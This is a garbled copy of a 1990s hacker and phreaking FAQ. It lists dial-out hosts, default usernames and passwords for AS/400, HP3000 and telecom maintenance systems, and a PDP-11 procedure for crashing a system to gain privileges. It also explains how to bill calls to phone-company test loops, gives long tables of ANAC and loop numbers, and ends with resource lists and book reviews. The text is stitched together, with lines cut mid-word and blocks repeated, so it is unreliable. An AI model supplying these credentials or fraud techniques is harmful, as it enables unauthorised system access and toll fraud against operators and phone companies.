128.112.131.110
128.112.131.111
128.112.131.112
128.112.131.113
ef="telnet://128.112.1128.249.27.154 c modem96
atdt 9xxx-xxxx
128.249.27.153 " -+ as above +- "
modem24.bcm.tmc.edu
modem12.bcm.tmc.edu
714 130.191.4.70 atdt 8xxx-xxxx
804 ublan.acc.virginia.edu c hayes
128.143.70.101 connect hayes
atdt xxx-xxxx
902 star.ccs.tuns.ca "dialout" [down...]
916 128.120.2.251 "dialout" [down...]
129.137.33.72 [can't connect]
??? dialout1.princeton.edu [can't connect]
dswitch.byu.edu "C Modem" [can't connect]
modem.cis.uflu.edu [can't connect]
r596adi1.uc.edu [can't connect]
f="telnet://vtnet1.cns.ut.edu">vtnet1.cns.ut.edu "CALL" or "call" [can't connect]
18.26.0.55 [can't connect]
128.173.5.4 [need password!]
128.187.1.2 [need password!]
129.137.33.71 [can't connect]
bstorm.bga.com / port=4000 [what is this?]
> Password?
>
> Once in, type GO MAIN
> COPYRIGHT CONTROL DATA 1978, 1987.
>
> 88/02/16. 02.36.53. N265100
> CSUS CYBER 170-730. NOS 2.5.2-678/3.
> FAMILY:
>
> You would normally just hit return at the family prompt.
> Next prompt is:
> USER NAME:
> EXPECTED A :HELLO COMMAND. (CIERR 6057)
> MPE XL:
> EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
> MPE XL:
> XXXXXXXX
>
> @
> @
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> PLEASE ENTER YOUR ID:-1->
> PLEASE ENTER YOUR PASSWORD:-2->
>
> CITICORP (CITY NAME). KEY GHELP FOR HELP.
> XXX.XXX
> PLEASE SELECT SERVICE REQUIRED.-3->
> <any text>
>
> ER!
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> CONNECT
> Primenet V 2.3 (system)
> also
>
> secofr/secofr (sometimes...)
> ibm/password
> ibm/2222
> ibm/service> Format is Account.Group,Job
>3/10/87 00:29:47
> RELEASE 8003
> OSL, PLEASE.
> ?
>
> NIH Tri-SMP 7.02-FF 16:30:04 TTY11
> system 1378/1381/1453 Connected to Node Happy(40) Line # 12
> Please LOGIN
> .
> !
> qsysopr/qsysopr (system operator)
> qpgmr/qpgmr (default programmer)
>
> also
>
> secofr/secofr (sometimes...)
> ibm/password
> ibm/2222
> ibm/service> Format is Account.Group,Job
>gt; MGR .CONV
> MGR .COGNOS
> OPERATOR .COGNOS
> MANAGER .COGNOS
> OPERATOR .DISC
> MGR .HPDESK
> MGR .HPWORD
> FIELD .HPWORD
> MGR .HPOFFICE
> SPOOLMAN .HPOFFICE
> ADVMAIL .HPOFFIPERATOR .SYS
> OPERATOR .SYSTEM
> FIELD .SUPPORT
>RATOR .SUPPORT
> MANAGER .TCH
> MAIL .TELESUP
> MANAGER .TELESUP
> MGR .TELESUP
.HPP196
> MGR .INTX3
> MGR .ITF3000
> MANAGER .ITF3000
> MAIL .MAIL
> MGR .NETBASE
> MGR .REGO
> MGR .RJE
> MGR .ROBELLE
> MANAGER .SECURITY
> MGR .SECURITY
> FIELD .SERVICE
> MANAGER .SYS
> MGR .SYS
> PCUSER .SYS
> RSBCMON .SYS
> OPERATOR .SYS
> OPERATOR .SYSTEM
> FIELD .SUPPORT
> OPERATOR .SUPPORTNAGER .TCH
> MAIL .TELESUP
> MANAGER .TELESUP
> MGR .TELESUP
blks=1000" to get some swap
> space so the new step won't wedge.
>
> type " run $acnt" and change the password of any account
> with a group number of 7 or less.
>
> You may find that the ^C does not work. Try ^Z and ESC as
> well. Also try all 3 as terminators to valid and invalid
> times. If none of the above work, use the halo halt
> the system, just after a invalid date-time. Look for a user
> mode PSW 1[4-7]xxxx. then deposit 177777 into R6, cross your
> fingers, write protect the drive and continue the system.
> This will hopefully result in indirect blowing up... And
> hopefully the system has not been fully secured.> Username Passwords
> ~~~~~~~~ ~~~~~~~~~
> bcim bcimpw
> bciim bciimpw
> bcms bcmspw, bcms
> bcnas bcnspw
> blue bluepw
> browse looker, browsepw
craft crftpw, craftpw, crack
> cust custpw
> enquiry enquirypw
> field support
> inads indspw, inadspw, inads
> init initpw
> kraft kraftpw
> locate locatepw
> maint maintpw, rwmaint
> nms nmspw
> rcust rcustpw
> support supportpw
> tech field#
# services This file describes the various services that are
# available from the TCP/IP subsystem. It should be
# consulted instead of using the numbers in the ARPA
# include files, or, worse, just guessing them.
#
# Version: @(#)/etc/servi 3.02 02/21/93
#
# Author: Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org>
#
tcpmux 1/tcp # rfc-1078
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
chargen 19/udp e
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp 102/tcp
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop-2 109/tcp # PostOffice V.2
pop-3 110/tcp # PostOffice V.3
sunrpcly to sri-nic
domain 53/tcp
domain 53/udp
mtp 57/tcp # deprecated
bootps 67/udp # bootp server
bootpc 68/udp # bootp client
tftp 69/udp
rje 77/tcp
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp # BSD supdupd(8)
hostnames 101/tcp hostname # usually to sri-nic
iso-tsap 102/tcp
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop-2 109/tcp # PostOffice V.2
pop-3 110/tcp # PostOffice V.3
sunrpc # SunOS talkd(8)
efs 520/tcp # for LucasFilm
route 520/udp router routed # 521/udp too
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc # experimental
conference 531/tcp chat
netnews 532/tcp readnews
netwall 533/udp # -for emergeetwork_terminal
ingreslock 1524/tcp
tn uucpd # BSD uucpd(8) UUCP service
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs # Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
pcserver 600/tcp # ECD Integrated PC board srvr
mount 635/udp # NFS Mount Service
pcnfs 640/udp # PC-NFS DOS Authentication
bwnfs 650/udp # BW-NFS DOS Authentication
listen 1025/tcp listener RFS remote_file_sharing
nterm 1026/tcp remote_login network_terminal
ingreslock 1524/tcp
tnet 1600/tcp # transputer net daemon
nfs 2049/udp # NFS File Service
irc 6667/tcp # Internet Relay Chat
dos 7000/tcp msdos
# End of services.
Section B: Telephony
Quarter Signal - 1700+2200 33ms on, 33ms off, 5 times repeating
2233 Branham Lane
San Jose, CA 95124
(800) 538-5000
Part Number: 6.5536MHZ<
Blue Boxes still work in areas using in-band signalling. Modern phone
signalling switches using ESS (Electronic Signalling S>
04. Which payphones will a Red Box work on?
09. What is the ANAC number for my area?NPA ANAC number Comments
--- --------------- ----------------------------------------
202 958-xxxx Dictrict of Columbia
203 960 CT (All)
203 970 CT (All)
204 644-xxxx Manitoba
205 908-222-2222 Birmingham, AL
206 411 WA /* Not US West */
207 958 ME (All)
209 830 Stockton, CA
212 958 Manhattan, NY
213 114 Los Angeles, CA
213 1223 Los Angeles, CA /* some 1AESS switches */
213 211-2345 Los Angeles, CA /* English response */
213 211-2346 Los Angeles, CA /* DTMF response */
213 61056 Los Angeles, CA
214 790 Dallas, TX /* GTE */
214 970-222-2222 Dallas, TX
214 970-611-1111 Dallas, TX /* Southwestern Bell */
215 410-xxxx Philadelphia, PA
217 200-xxx-xxxx Champaign-Urbana/Springfield, IL
301 Hagerstown/Rockville, MD
305 200-222-2222 Ft. Lauderdale/Key West/Miami, FL
309 200-xxx-xxxx Peoria/Rock Island, IL
310 114 Long Beach, CA /* on many GTE switches */
310 1223 Long Beach, CA /* some 1AESS switches */
310 211-2345 Long Beach, CA /* English response */
310 211-2346 Long Beach, CA /* DTMF response */
312 200 Chicago, IL
312 290 Chicago, IL
312 1-200-8825 Chicago, IL (Last four change rapidly)
313 200-200-2002 Ann Arbor/Dearborn/Detroit, MI
313 200-222-2222 Ann Arbor/Dearborn/Detroit, MI
313 200-xxx-xxxx Ann Arbor/Dearborn/Detroit, MI
313 200200200200200 Ann Arbon/Detroit, MI
314 511 Columbia/Jefferson City, MO
317 310-222-2222 Indianapolis/Kokomo, IN
317 743-1218 Indianapolis/Kokomo, IN
401 222-2222 RI (All)
402 311 Lincoln, NE
403 311 Alberta, Yukon and N.W. Territory
403 908-222-2222 Alberta, Yukon and N.W. Territory
403 999 Alberta, Yukon and N.W. Territory
404 311 Atlanta, GA
404 940-xxx-xxxx Atlanta, GA
405 897 Enid/Oklahoma City, OK
407 200-222-22ndo/West Palm Beach, FL
408 300-xxx-xxxx San Jose, CA
408 760 San Jose, CA
408 940 San Jose, CA
409 951 Beaumont/Galveston, TX
409 970-xxxx Beaumont/Galveston, TX
410 200-6969 Annapolis/Baltimore, MD
410 200-555-1212 Annapolis/Baltimore, MD
410 811 Annapolis/Baltimore, MD
412 711-6633 Pittsburgh, PA
412 711-4411 Pittsburgh, PA
412 999-xxxx Pittsburgh, PA
413 958 Pittsfield/Springfiel3 200-555-5555 Pittsfield/Springfield, MA
414 330-2234 Fond du Lac/Green Bay/Milwaukee/Racine, WI
415 200-555-1212 San Francisco, CA
415 211-2111 San Francisco, CA
415 2222 San Francisco, CA
415 640 San Francisco, CA
415 760-2878 San Francisco, CA
415 7600-2222 San Francisco, CA
419 311 Toledo, OH
502 997-555-1212 Frankfort/Louisville/Paducah/Shelbyville,
KY
503 611 Portland, OR /* not all parts of town */
508 958 Fall River/New Bedford/Worchester, MA
508 200-222-1234 Fall River/New Bedford/r, MA
508 200-222-2222 Fall River/New Bedford/Worchester, MA
509 560 Spokane/Walla Walla/Yakima, WA
512 200-222-2222 Austin/Corpus Christi, TX
512 830 Austin/Corpus Christi, TX
512 970-xxxx Austin/Corpus Christi, TX
515 5463 Des Moines, IA
516 958 Hempstead/Long Island, NY
516 968 Hempstead/Long Island, NY
517 200-222-2222 Bay City/Jackson/Lansing, MI
517 200200200200200 Bay City/Jackson/Lansing, MI
518 997 Albany/Scheny/Troy, NY
518 998 Albany/Schenectady/Troy, NY
602 593-0809 Phoenix, AZ
602 593-6017 Phoenix, AZ
602 593-7451 Phoenix, AZ
603 200-222-2222 NH (All)
606 997-555-1212 Ashland/Winchester, KY
607 993 Binghamton/Elmira, NY
609 958 Atlantic City/Camden/Trenton/Vineland, NJ
612 511 Minneapolis/St.Paul, MN
615 200200200200200 Nashville, TN
615 830 Nashville, TN
616 200-222-2222 Battle Creek/Grand Rapids/Kalamazoo, MI
617 200-222-1234 Boston, MA
617 200-222-2222 Boston, MA
617 200-444-4444 Boston, MA /* Woburn, MA */
617 220-2622 Boston, MA
617 958 Boston, MA
618 200-xxx-xxxx Alton/Cairo/Mt.Vernon, IL
703 811 Fairfax/Alexandri La Salle/Rockford, IL
817 211 Ft. Worth/Waco, TX
817 970-611-1111 Ft. Worth/Waco, TX /* Southwestern Bell */
818 1223 Pasadena, CA /* some 1AESS switches */
818 211-2345 Pasadena, CA /* English response */
818 2Y
/* Rochester Tel */
717 958 Harrisburg/Scranton/Wilkes-Barre, PA
718 958 Bronx/Brooklyn/Queens/Staten Island, NY
802 2-222-222-2222 Vermont (All)
802 200-222-2222 Vermont (All)
805 830 San Luis Obispo, CA
806 970-xxxx o/Lubbock, TX
810 200200200200200 Michigan
812 410-555-1212 Evansville, IN
813 311 Ft. Meyers/St. Petersburg/Tampa, FL
815 200-xxx-xxxx La Salle/Rockford, IL
815 290 La Salle/Rockford, IL
817 211 Ft. Worth/Waco, TX
817 970-611-1111 Ft. Worth/Waco, TX /* Southwestern Bell */
818 1223 Pasadena, CA /* some 1AESS switches */
818 211-2345 Pasadena, CA /* English response */
818 2urg/Tampa, FL
908 55?-xxxx New Brunswick, Nxxx Peekskill/Poughkeepsie/White Plains/
Yonkers, NY
Canada:
416 57x-xxxx Toronto, Ontario
416 99x-xxxx Toronto, Ontario
416 999-xxx-xxxx Toronto, Ontario
514 320-xxx-xxxx Montreal, Quebec
613 999-xxx-xxxx Ottawa, Ontario
Australia:
+61 199
United Kingdom:
174
ToneLoc v0.99 User Manual
by Minor Threat & Mucho Maas
Loops are a pair of phone numbers, usually consecutive, like 836-9998
and 836-9999. They are used by the phone company for testing. What
good do lor thinks that she just called you, and
that's it! Now the phone bill will go to the loop, and your local
RBOC will get the bill! Use this technique in moderation, or the loop
may go down. Loops are probably most useful when you want to talk to
someone her.
When BOTH ends are called, the people that called each end can talk
through the loop. Some loops are voice filtered and won't pass
anything but a constant tone; these aren't much use to you. Here's
what you can use working loops for: billing phone calls! First, call
the end that gives the loud tone. Then if the operator or someone
calls the other end, the tone will go quiet. Act like the phone just
rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
what the fuck ever. The operator thinks that she just called you, and
that's it! Now the phone bill will go to the loop, and your local
RBOC will get the bill! Use this technique in moderation, or the loop
may go down. Loops are probably most useful when you want to talk to
someone 13 781-9996 781-9997
313 787-9996 787-3 822-9996 822-9997
313 833-9996 833-9997
313 851-9996 851-9997
313 871-9996 871-9997
313 875-9996 875-9997
313 886-9996 886-9997
313 888-9996 888-9997
313 898-9996 898-9997
313 934-9996 934-9997
313 942-9996 942-9997
313 963-9996 963-9997
313 977-9996 977-9997
313 995-9996 995-9997
402 422-0001 422-0002
402 422-0005 422-0006
402 422-0007 422-0008
402 422-0003 422-0004
402 422-0005 422-0006
402 422-0007 422-0008
402 422-0009 ALL-PREF
402 422-0003 422-0004
40209 ALL-PREF
402 422-0001 422-0002
402 572-0003 572-0004
517 422-9996 422-9997
517 423-9996 423-9997
517 455-9996 455-9997
517 563-9996 563-9997
517 663-9996 663-9997
517 851-9996 851-9997
609 921-9929 921-9930
609 994-9929 994-9930
616 997-9996 997-9997
616 ALL-PREF ALL-PREF
713 224-1499 759-1799
713 324-1499 324-1799
713 342-1499 342-1799
713 351-1499 351-1799
713 354-1499 354-1799
713 356-1499 356-1799
713 442-1499 442-1799
713 447-1499 447-1799
713 455-1499 455-1799
713 458-1499 458-1799
713 462-1499 462-1799
713 466-1499 466-1799
713 468-1499 468-1799
713 469-1499 469-1799
713 471-1499 471-1799
713 481-1499 481-1799
713 482-1499 482-1799
713 484-1499 484-1799
713 487-1499 487-1799
713 4899 489-1799
713 492-1499 492-1799
713 493-1499 493-1799
713 524-1499 524-1799
713 526-1499 526-1799
713 555-1499 555-1799
713 661-1499 661-1799
713 664-1499 664-1799
713 665-1499 665-1799
713 666-1499 666-1799
713 667-1499 667-1799
713 682-1499 976-1799
713 771-1499 771-1799
713 780-1499 780-1799
713 781-1499 997-1799
713 960-1499 960-1799
713 977-1499 977-1799
713 988-1499 988-1799
714 535-1118 535-1119
714 538-1118 538-1119
714 858-1118 858-1119
714 879-1118 879-1119
805 528-0044 528-0045
805 544-0044 544-0045
805 773-0044 773-0045
813 385-9971
908 776-9930 776-9930Unidirectory (900)933-3330
Telename (900)884-1212
Note that these are 900 numbers, and will cost you approximately one
dollar per minute.203 203-771-8080 CT (All)
614 614-464-0123 Columbus/Steubenville, OH
813 813-270-8711 Ft. Meyers/St. Petersburg/Tampa, FL
12778 Brookprinter Place
Poway, CA 92064
(619) 679-0303
335 Willow Street
North Andover, MA 01845-5995
(508) 682-2000 1209 1336 1477 1633
697 1 2 3 A
770 4 5 6 B
852 7 8 9 C
941 * 0 # D
Section C: Resources
aql.gatech.edu
bellcore.com
cert.org
crimelab.com
cyberspace.com
deimos.cs.uah.edu
freeside.com
ftp.csua.berkeley.edu /pub/cypherpunks
ftp.eff.org /pub/cud
ftp.etext.org
ftp.mcs.com /mcsnet.users/crisadm/stuff/research/samples
ftp.netcom.com /pub/bradleym
ftp.netcom.com /pub/zzyzx
ftp.rahul.net /pub/lps
ftp.std.com /obi/Mischief/
ftp.std.com /archives/alt.locksmithing
ftp.warwick.ac.uk
ftp.win.tue.nl
ftp.winternet.com /users/craigb
garbo.uwasa.fi /pc/crypt
ghost.dsi.unimi.it /pub/crypt
grind.isca.uiowa.edu
hack-this.pc.cc.cmu.edu
halcyon.com
et
lcs.mit.edu /* Telecom archives */
mary.iia.org /pub/users/patriot
nic.funet.fi /pub/doc/cud
paradox1.denver.colorado.edu
/anonymous/text-files/pyrotechnics/
pyrite.rutgers.edu
rtfm.mit.edu
sekurity.com
spy.org
vincent2.iastate.edu login: anonymous.mabell
/* Closed for the Summer */
wimsey.bc.ca /pub/crypto
machine aql.gatech.edu
login anonymous
password root@
machine bellcore.com
login anonymous
password root@
machine cert.org
login anonymous
password root@
machine crimelab.com
login anonymous
password root@
machine cyberspace.com
login anonymous
password root@
machine deimos.cs.uah.edu
login anonymous
password root@
machine ftp.csua.berkeley.edu
login anonymous
password root@
machine ftp.eff.org
login anonymous
password root@
machine ftp.etext.org
login anonymous
password root@
machine ftp.mcs.com
login anonymous
password root@
machine ftp.netcom.com
login anonymous
password root@
machine ftp.netcom.com
login anonymous
password root@
machine ftp.rahul.net
login anonymous
password root@
machine ftp.std.com
login anonymous
password root@
machine ftp.std.com
login anonymous
password root@
machine ftp.warwick.ac.uk
login anonymous
password root@
machine ftue.nl
login anonymous
password root@
machine ftp.winternet.com
login anonymous
password root@
machine garbo.uwasa.fi
login anonymous
password root@
machine ghost.dsi.unimi.it
login anonymous
password root@
machine grind.isca.uiwa.edu
login anonymous
password root@
machine hack-this.pc.cc.cmu.edu
login anonymous
password root@
machine halcyon.com
login anonymous
password root@
machine ideal.ios.net
login anonymous
password root@
machine lcs.mit.edu
login anonymous
root@
machine mary.iia.org
login anonymous
password root@
machine nic.funet.fi
login anonymous
password root@
machine paradox1.denver.colorado.edu
login anonymous
password root@
machine pyrite.rutgers.edu
login anonymous
password root@
machine ripem.msu.edu
login anonymous
password root@
machine rtfm.mit.edu
login anonymous
password root@
machine sekurity.com
login anonymous
password root@
machine spy.org
login anonymous
password root@
machine theta.iis.u-tokyo.acp
login anonymous
password root@
machine vincent2.iastate.edu
login anonymous
password mabell
machine wimsey.bc.ca
login anonymous
password root@
alt.2600 Do it 'til it hertz
alt.2600.hope.tech Technology concerns for Hackers on
Planet Earth 1994
alt.cellular
alt.dcom.telecom
alt.hackers Descriptions of projects currently under
development (Moderated)
alt.hackers.malicious The really bad guys - don't take candy
from them
alt.locksmithing You locked your keys in *where*?
alt.security Security issues on computer systems
alt.security.index Pointers to good stuff in misc.security
(Moderted)
alt.security.keydist Exchange of keys for public key
encryption systems
alt.security.pgp The Pretty Good Privacy package
alt.security.ripem A secure email system illegal to export
from the US
comp.dcom.cellular
comp.dcom.telcom.tech
comp.dcom.telecom Telecommunications digest.
(Moderated)
comp.dcom.telecom.tech
comp.org.cpsr.announce
comp.org.cpsr.talk
comp.org.eff
comp.risks
comp.security.announce
comp.security.misc Security issues of computers and
networks.
comp.security.unix Discussion of Unix secty
comp.virus Computer viruses & security. (Moderated)
misc.security Security in general, not just computers.
(Moderated)
rec.pyrotechnics
sci.crypt Different methods of data en/decryption.
http://crimelab.com//bugtraq/bugtraq.html
http://cs.purdue.edu/homes/spaf/coast.html
http://cs.purdue.edu/homes/spaf/pcert.html
http://dfw.net/~aleph1
http://first.orghttp://l0pht.com
07. What are some BBS's of interest to hackers?
Home BBS (303)343-4053
fARM R0Ad 666 (713)855-0261
Corrupt Sekurity (303)753-1719
Computer Security Basics
Author: Deborah Russell and G.T. Gengemi Sr.
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1991
ISBN: 0-937175-71-4
This is an excellent book. It gives a broad overview of
computer security without sacrificing detail. A must read
for the beginning security expert.
Computer Security Management
Author: Karen Forcht
Publisher: Boyd and Fraser
Copyright Date: 1994
ISBN: 0-87835-881-1
Information Systems Security
Author: Philip Fites and Martin Kratz
Publisher: Van Nostrad Reinhold
Copyright Date: 1993
ISBN: 0-442-00180-0
Practical Unix Security
Author: Simson Garfinkel and Gene Spafford
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1991
ISBN: 0-937175-72-2
Finally someone with a very firm grasp of Unix system
security gets down to writing a book on the subject.
Buy this book. Read this book.
Firewalls and Internet Security
Author: William Cheswick and Steven Bellovin
Publisher: Addison Wesley
Copyright Date: 1994
ISBN: 0-201-63357-4
Unix System Security
Author: Rik Farrow
Publisher: Addison Wesley
Coished information. The only secret we learn from
reading the book is that Sylvia Moon is a younger woman
madly in love with the older David Stang.
Complete Lan Security and Control
Author: Peter Dav
Publisher: Windcrest / McGraw Hill
Copyright Dat A. Curry
Publisher: Addison-Wesley
Copyright Date: 1992
ISBN: 0-201-56327-4
Unix System Security
Author: Patrick H. Wood and Stephen G. Kochan
Publisher: Hayden Books
Copyright Date: 1985
ISBN: 0-672-48494-3
Network Security Secrets
Author: David J. Stang and Sylvia Moon
Publisher: IDG Books
Copyright Date: 1993
ISBN: 1-56884-021-7
Not a total waste of paper, but definitely not worth the
$49.95 purchase price. The book is a rehash of previously
published information. The only secret we learn from
reading the book is that Sylvia Moon is a younger woman
madly in love with the older David Stang.
Complete Lan Security and Control
Author: Peter Davis
Publisher: Windcrest / McGraw Hill
Copyright Datrested in cryptography,
this is a must read. This may be the first and last
book on cryptography you may ever need to buy.
Cryptography and Data Security
Author: Dorothy Denning
Publisher: Addison-Wesley Publishing Co.
Copyright Date: 1982
ISBN: 0-201-10150-5
The Little Black Book of Computer Viruses
Author: Mark Ludwig
Publisher: American Eagle Publications
Copyright Date: 1990
ISBN: 0-929408-02-0
The original, and still the best, book on computer viruses.
No medi here, just good clean technical information.
Computer Viruses, Artificial Life and Evolution
Author: Mark Ludwig
Publisher: American Eagle Publications
Copyright Date: 1993
ISBN: 0-929408-07-1
Computer Viruses, Worms, Data Diddlers, Killer Programs,
and Other Threats to Your System
Author: John McAfee and Colin Haynes
Publisher: St. Martin's Press
Copyright Date: 1989
ISBN: 0-312-03064-9 and 0-312-02889-X
The Hacker Crackdown: Law and Disorder on the
Electronic Frontier
Author: Bruce Sterling
Publisher: Bantam Books
Copyright Date: 1982
ISBN: 0-553-56370-X
Bruce Sterling has recently released the book FREE to the net.
The book is much easier to read in print form, and the
papeis no super hacker. There is little or no real
information in this book. The Knightmare gives useful advice
like telling you not to dress up before going trashing.
The Knightmare's best hack is fooling Loompanics into
publishing this gartie Hafner and John Markoff
Publisher: Simon and Schuster
Copyright Date: 1991
ISBN: 0-671-77879-X
The Cuckoo's Egg
Author: Cliff Stoll
Publisher: Simon and Schuster
Copyright Date: 1989
ISBN: 0-671-72688-9
Hackers: Heroes of the Computer Revolution
Author: Steven Levy
Publisher: Doubleday
Copyright Date: 1984
ISBN: 0-440-13495-6
Secrets of a Super Hacker
Author: The Knightmare
Publisher: Loompanics
Copyright Date: 1994
ISBN: 1-55950-106-5
The Knightmare is no super hacker. There is little or no real
information in this book. The Knightmare gives useful advice
like telling you not to dress up before going trashing.
The Knightmare's best hack is fooling Loompanics into
publishing this garbage.
Th>
Subscriptions: $18/yr
P.O. Box 191826
San Francisco, CA 94119-9866
544 Second Street
San Francisco, CA 94107-1427
P.O. Box 717
Palo Alto, CA 9y.CPSR Membership Categories
75 REGULAR MEMBER
50 Basic member
200 Supporting member
500 Sponsoring member
1000 Lifetime member
20 Student/low income member
50 Foreign subscriber
50 Library/institutional subscriber
P.O. Box 717
Palo Alto, CA 9
1 Kendall Square #143
P.O. Box 9171
Cambridge, MA 02139 USA
P.O. Box 573
Long Beach, MS 39560
Section D: 2600
"The Atari 2600 has NOTHING to do with blue boxes or telephones
or the 2600 hertz tone. The 2600 hertz tone was simply the first
step towards exploring the network. If you were successful at
getting a tall to drop, then billing would stop at that
point but there would be billing for the number alread in the bookstore. Be sure to include the
bookstores name and address.
We've been selling 2600 at the same newsstand price ($4) since 1988
and we hope to keep it at that price for as long as we can get away
with it. At the same time, $21 is about the right price to cover
subscriber costs, including postage and record keeping, etc. People
who subscribe don't have to worry about finding an issue someplace,
they tend to get issues several weeks before the newsstands get
them, and they can ke out free ads in the 2600 Marketplace.
Section E: Miscellaneous
TLA Three Letter Acronym
ACL Access Control List
PIN Personal Identification Number
TCB Trusted Computing Base
ALRU Automatic Line Record Update
AN Associated Number
ARSB port Evaluation and Analysis Tool
FLT Fairlight
NTA The Nocturnal Trading Alliance
PDX Paradox
PE Public Enemy
QTX S!P Supr!se Productions
TDT The Dream Team
THG The Humble Guys
THP The Hill People
TRSI T Central Office
COCOT Customer Owned Coin Operated Telephone
CRSAB Centralized Repair Service Answering Bureau
DDD Direct Distance Dialing
ECC Enter Cable Change
LD Long Distance
LMOS Loop Maintenance Operations System
MLT Mechanized Loop Testing
NPA Numbering Plan Area
POTS Plain Old Telephone Service
RBOC Regional Bell Operating Company
RSB Repair Service BurSS Special Service
TAS Telephone Answering Service
TH Trouble History
TREAT Trouble Report Evaluation and Analysis Tool
FLT Fairlight
NTA The Nocturnal Trading Alliance
PDX Paradox
PE Public Enemy
QTX Quartex
S!P Supr!se Productions
TDT The Dream Team
THG The Humble Guys
THP The Hill People
TRSI T="validcc">02. How do I determine if I have a valid credit card
number?
rahul.net /pub/lps
http://www.engin.umich.edu/~jgotts/underground.html
http://www.phantom.com/~king
will@gnu.ai.mit.edu
Please send constructive feedback to will@gnu.ai.mit.edu.
* This document has been modified to protect the identities of
certain authors, at their request - kyoorius@techfreakz.org 2/11/2001